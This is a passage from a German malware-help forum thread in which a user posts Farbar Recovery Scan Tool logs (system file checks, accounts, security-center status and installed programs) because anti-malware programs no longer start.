C:\Users\xxxxxx\AppData\Local\Temp\jre-8u51-windows-au.exe 2015-10-28 11:01 - 2015-10-28 11:01 - 000585824 _____ (Oracle Corporation) C:\Users\xxxxxx\AppData\Local\Temp\jre-8u65-windows-au.exe 2015-07-03 10:23 - 2015-07-03 10:23 - 007000049 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.6.7.9.2.Installer.exe 2015-12-24 17:15 - 2015-12-24 17:15 - 004121418 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.6.8.8.Installer.exe 2016-11-09 11:36 - 2016-11-09 11:36 - 002842320 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.1.Installer.exe 2017-01-11 10:33 - 2017-01-11 10:33 - 002858376 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.2.2.Installer.exe 2017-03-14 10:36 - 2017-03-14 10:36 - 002903480 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.3.2.Installer.exe 2017-04-13 10:58 
- 2017-04-13 10:58 - 002982992 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.3.3.Installer.exe 2017-05-29 10:37 - 2017-05-29 10:38 - 002990616 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.4.1.Installer.exe 2015-06-25 07:53 - 2015-06-25 07:53 - 000032568 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\SDShelEx-win32.dll 2015-06-25 07:53 - 2015-06-25 07:53 - 000032056 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\SDShelEx-x64.dll 2015-10-06 14:29 - 2017-05-29 08:30 - 058128344 _____ (Skype Technologies S.A.) C:\Users\xxxxxx\AppData\Local\Temp\SkypeSetup.exe 2015-09-23 10:45 - 2015-09-23 10:45 - 000721920 _____ () C:\Users\xxxxxx\AppData\Local\Temp\sqlite-3.8.6-amd64-sqlitejdbc.dll 2015-08-03 01:58 - 2015-08-03 01:58 - 000118784 _____ () C:\Users\xxxxxx\AppData\Local\Temp\xmlUpdater.exe ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\Windows\system32\winlogon.exe => MD5 ist legitim C:\Windows\system32\wininit.exe => MD5 ist legitim C:\Windows\SysWOW64\wininit.exe => MD5 ist legitim C:\Windows\explorer.exe => MD5 ist legitim C:\Windows\SysWOW64\explorer.exe => MD5 ist legitim C:\Windows\system32\svchost.exe => MD5 ist legitim C:\Windows\SysWOW64\svchost.exe => MD5 ist legitim C:\Windows\system32\services.exe => MD5 ist legitim C:\Windows\system32\User32.dll => MD5 ist legitim C:\Windows\SysWOW64\User32.dll => MD5 ist legitim C:\Windows\system32\userinit.exe => MD5 ist legitim C:\Windows\SysWOW64\userinit.exe => MD5 ist legitim C:\Windows\system32\rpcss.dll [2017-09-14 23:01] - [2017-08-11 08:35] - 000512000 _____ (Microsoft Corporation) 3F1A199859B4F3F8357B2A0AF5666A54 C:\Windows\system32\dnsapi.dll => MD5 ist legitim C:\Windows\SysWOW64\dnsapi.dll => MD5 ist legitim C:\Windows\system32\Drivers\volsnap.sys => MD5 ist legitim LastRegBack: 2017-09-21 19:46 ==================== Ende von FRST.txt ============================ |
03.10.2017, 22:31 | #14 |
| Anti-malware programs can no longer be started And here is the additions.txt. The Windows username has been replaced with 'xxxxxx' in each case. FRST Additions Logfile: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-10-2017 01 durchgeführt von xxxxxx (03-10-2017 22:22:20) Gestartet von F:\ Windows 7 Professional Service Pack 1 (X64) (2015-05-16 08:01:46) Start-Modus: Safe Mode (minimal) ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-1772142865-3804567698-3626976838-500 - Administrator - Disabled) Gast (S-1-5-21-1772142865-3804567698-3626976838-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1772142865-3804567698-3626976838-1002 - Limited - Enabled) xxxxxx (S-1-5-21-1772142865-3804567698-3626976838-1001 - Administrator - Enabled) => C:\Users\xxxxxx ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 7-Zip 15.14 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1514-000001000000}) (Version: 15.14.00.0 - Igor Pavlov) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated) Adobe Flash Player 27 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 27.0.0.130 - Adobe Systems Incorporated) Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.130 - Adobe Systems Incorporated) Adobe Photoshop 7.0 (HKLM-x32\...\Adobe Photoshop 7.0) (Version: 7.0 - Adobe Systems, Inc.) 
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.4.194 - Adobe Systems, Inc.) Android Studio (HKLM\...\Android Studio) (Version: 1.0 - Google Inc.) Apache Tomcat 8.0.27 (HKLM\...\nbi-tomcat-8.0.27.0.0) (Version: - ) Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation) Atom (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\atom) (Version: 1.18.0 - GitHub Inc.) Azure AD Authentication Connected Service (HKLM-x32\...\{8A1AD070-269F-4A15-AAB5-76AB896EF195}) (Version: 14.0.25420 - Microsoft Corporation) Hidden AzureTools.Notifications (HKLM-x32\...\{1E5CA362-39B6-4BD0-B9C0-69CF15F0FEA2}) (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden BitMeter (HKLM-x32\...\BitMeter) (Version: - ) Blend for Visual Studio SDK for .NET 4.5 (HKLM-x32\...\{37E53780-3944-4A6A-842F-727128E8616E}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden Blisk (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\Blisk) (Version: 0.61.2743.166 - Blisk) BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.) Bullzip MS Access to MySQL 5.3.0.259 (HKLM-x32\...\Bullzip MS Access to MySQL_is1) (Version: - Bullzip) chip 1-click download service (HKLM-x32\...\{503CA94E-0834-4CEE-AD92-BA17AF4E809A}) (Version: 3.6.9.0 - Chip Digital GmbH) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.) 
Citrix Online Launcher (HKLM-x32\...\{09DA5EE2-7E46-4DC4-96F9-BFEE50D40659}) (Version: 1.0.408 - Citrix) ColorPic (HKLM-x32\...\ColorPic) (Version: 4.1 - Iconico) Composer - Php Dependency Manager (HKLM-x32\...\{7315AF68-E777-496A-A6A2-4763A98ED35A}_is1) (Version: - getcomposer.org) CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.6.7225 - CyberLink Corp.) CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.6.3821 - CyberLink Corp.) CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.) D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Desktop-Wecker (HKLM-x32\...\{1DC996A1-B1D1-46C5-B8C9-A936E7649329}) (Version: 1.0.0 - ROBL - PC - WARE) Docker Toolbox version 1.12.0 (HKLM\...\{FC4417F0-D7F3-48DB-BCE1-F5ED5BAFFD91}_is1) (Version: 1.12.0 - Docker) Dotfuscator and Analytics Community Edition 5.22.0 (HKLM-x32\...\{60018889-9E0F-43E8-9B89-29E8C828B40A}) (Version: 5.22.0.3788 - PreEmptive Solutions) Hidden Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company) ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard) FileZilla Client 3.25.0 (HKLM-x32\...\FileZilla Client) (Version: 3.25.0 - Tim Kosse) Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic) Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden FreeCAD 0.16 - A free open source CAD system (HKLM-x32\...\FreeCAD 0.16) (Version: 0.16.6700 - Juergen Riegel) Git version 2.9.0 (HKLM\...\Git_is1) (Version: 2.9.0 - The Git Development Community) GlassFish Server Open Source Edition 4.1.1 
(HKLM\...\nbi-glassfish-mod-4.1.1.0.1) (Version: - ) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.) Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden GoToMeeting 8.14.0.7716 (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\GoToMeeting) (Version: 8.14.0.7716 - LogMeIn, Inc.) Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.) Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden HP 3D DriveGuard (HKLM-x32\...\{D34A4D8B-B553-4A4D-A029-5B4F8F66C236}) (Version: 6.0.17.1 - Hewlett-Packard Company) HP CoolSense (HKLM-x32\...\{E2C8D0C2-1C97-4C05-939A-5B13A0FE655C}) (Version: 2.20.31 - Hewlett-Packard Company) HP Documentation (HKLM-x32\...\{C178F0A7-86C8-4BE0-8401-3BC4F6E12F81}) (Version: 1.3.0.0 - Hewlett-Packard) HP On Screen Display (HKLM-x32\...\{BB83BE06-E69A-4CC5-8421-96CCD196589E}) (Version: 1.3.6 - Hewlett-Packard Company) HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company) HP Security Assistant (HKLM\...\{ED6CD3AC-616B-4B20-BCF3-6E637B92A5AD}) (Version: 3.0.4 - Hewlett-Packard Company) HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15453.4066 - Hewlett-Packard Company) HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard) HP Software Framework (HKLM-x32\...\{4CA5FA45-36D1-4351-ADA1-9C87625F1D51}) (Version: 4.6.13.1 - Hewlett-Packard Company) HP Support Assistant (HKLM-x32\...\{8C696B4B-6AB1-44BC-9416-96EAC474CABE}) (Version: 7.5.2.12 - Hewlett-Packard Company) Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.11 - Softex Inc.) 
Hidden Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.11 - Softex Inc.) Hidden Java 7 Update 80 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417080FF}) (Version: 7.0.800 - Oracle) Java 8 Update 65 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418065F0}) (Version: 8.0.650.17 - Oracle Corporation) Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation) Java SE Development Kit 7 Update 79 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170790}) (Version: 1.7.0.790 - Oracle) Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.15 - Oracle Corporation) Java(TM) 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle) Java(TM) SE Development Kit 6 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0160450}) (Version: 1.6.0.450 - Oracle) JetBrains PhpStorm 7.1.5 (HKLM-x32\...\PhpStorm 7.1.5) (Version: 133.1886 - JetBrains s.r.o.) 
Line 6 Uninstaller (HKLM-x32\...\Line 6 Uninstaller) (Version: - Line 6) LockHunter 3.1, 32/64 bit (HKLM\...\LockHunter_is1) (Version: - Crystal Rich Ltd) Magnifying Glass 1.1 (HKLM-x32\...\Magnifying Glass_is1) (Version: - ) MaintenanceService 1.0.0 (HKLM-x32\...\zz.437.mcc) (Version: 1.0.0 - CSDI) <==== ACHTUNG Microsoft – Speichern als PDF oder XPS – Add-In für 2007 Microsoft Office-Programme (HKLM-x32\...\{90120000-00B2-0407-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation) Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation) Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation) Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 SDK (Deutsch) (HKLM-x32\...\{529EFF09-750D-48B9-A47A-34A3B6248C3F}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 
4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.7 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02053 - Microsoft Corporation) Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation) Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft SQL Server 2014 Management Objects (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation) Microsoft SQL Server 2014 Management Objects (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - 
Microsoft Corporation) Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation) Microsoft SQL Server 2014 T-SQL Language Service (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation) Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 
12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2015 Tools for Unity (HKLM-x32\...\{E02DF945-0531-4E5E-9C6B-2B660C0AE66D}) (Version: 2.8.0.0 - Microsoft Corporation) Microsoft Visual Studio Code (HKLM\...\{EA457B21-F73E-494C-ACAB-524FDE069978}_is1) (Version: 1.16.1 - Microsoft Corporation) Microsoft Visual Studio Community 2015 with Updates (HKLM-x32\...\{79b486b9-c5f0-4096-a00c-8351f59587c2}) (Version: 14.0.25420.1 - Microsoft Corporation) Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation) MongoDB 3.0.7 2008R2Plus SSL (64 bit) (HKLM\...\{40395681-4470-4EC8-B337-497C1E060E36}) (Version: 3.0.7 - MongoDB) MongoDB 3.5.3 2008R2Plus SSL (64 bit) (HKLM\...\{8927DD90-62A9-4057-B695-4D0D7918C8ED}) (Version: 3.5.3 - MongoDB) Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 55.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 de)) (Version: 55.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 55.0.3.6445 - Mozilla) MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{128C1654-3B9E-4959-8BFB-CE6F09C0A01D}) (Version: 14.0.25420 - Microsoft Corporation) Hidden Multi-Device Hybrid Apps using C# - Templates - ENU (HKLM-x32\...\{12D99739-FFD3-3761-8AA6-F929E0FE407E}) (Version: 14.0.23107 - Microsoft Corporation) Hidden MySQL Connector/ODBC 5.3 
(HKLM-x32\...\{4C6A664C-DCA0-4CC6-8752-ED0850E3135A}) (Version: 5.3.4 - Oracle Corporation) MySQL Workbench 6.3 CE (HKLM\...\{0D901124-B910-4985-9D4F-AC5C2FEF7493}) (Version: 6.3.7 - Oracle Corporation) NetBeans IDE 8.1 (HKLM\...\nbi-nb-base-8.1.0.0.201510222201) (Version: 8.1 - NetBeans.org) NetSpeedMonitor 2.5.4.0 x64 (HKLM\...\{88F41EE2-949B-4B52-933D-C7F8F67BC1D2}) (Version: 2.5.4.0 - Florian Gilles) Node.js (HKLM\...\{6BA2207A-7E42-434C-8DD4-A2FFC1D9EA68}) (Version: 7.5.0 - Node.js Foundation) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.4.1 - Notepad++ Team) NoteWorthy Composer 2 Demo (HKLM-x32\...\NoteWorthy Composer 2 Demo) (Version: Demo Version 2.75 - Noteworthy Software, Inc.) OEM Application Profile (HKLM-x32\...\{315F1A48-D883-B234-7C79-15873574ACC1}) (Version: 1.00.0000 - Ihr Firmenname) opensource (HKLM-x32\...\{3677D4D8-E5E0-49FC-B86E-06541CF00BBE}) (Version: 1.0.14960.3876 - Your Company Name) Hidden OpenSSL 1.1.0f (32-bit) (HKLM-x32\...\OpenSSL (32-bit)_is1) (Version: - OpenSSL Win32 Installer Team) Oracle Database 11g Express Edition (HKLM\...\{05A7B662-80A3-4EB9-AE1D-89A62449431C}) (Version: 11.2.0 - Oracle Corporation) Hidden Oracle Database 11g Express Edition (HKLM-x32\...\InstallShield_{05A7B662-80A3-4EB9-AE1D-89A62449431C}) (Version: 11.2.0 - Oracle Corporation) Oracle VM VirtualBox 5.0.24 (HKLM\...\{BA15D402-19CA-493E-958B-170A0C446F25}) (Version: 5.0.24 - Oracle Corporation) Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM-x32\...\{4860C1E5-CE58-4D32-89DE-37951333B4C9}) (Version: 4.6.01055 - Microsoft Corporation) PostgreSQL (HKLM\...\PostgreSQL 9.6) (Version: 9.6 - BigSQL) PreEmptive Analytics Visual Studio Components (HKLM-x32\...\{436A18DD-5F2C-4B3C-985E-AD3C13B0CC25}) (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.) 
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.80.218.2014 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7195 - Realtek Semiconductor Corp.) REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.13.1216 - REALTEK Semiconductor Corp.) Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group) Roslyn Language Services - x86 (HKLM-x32\...\{6970C7E1-F99D-388D-8903-DF8FCE677FED}) (Version: 14.0.25431 - Microsoft Corporation) Hidden Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden Ruby 2.1.7-p400 (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\{64763A89-6347-43AF-833F-3840615C62AE}_is1) (Version: 2.1.7-p400 - RubyInstaller Team) SceneBuilder (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\{com.oracle.javafx.scenebuilder.app}}_is1) (Version: 8.0.0 - Gluon) Skype™ 7.40 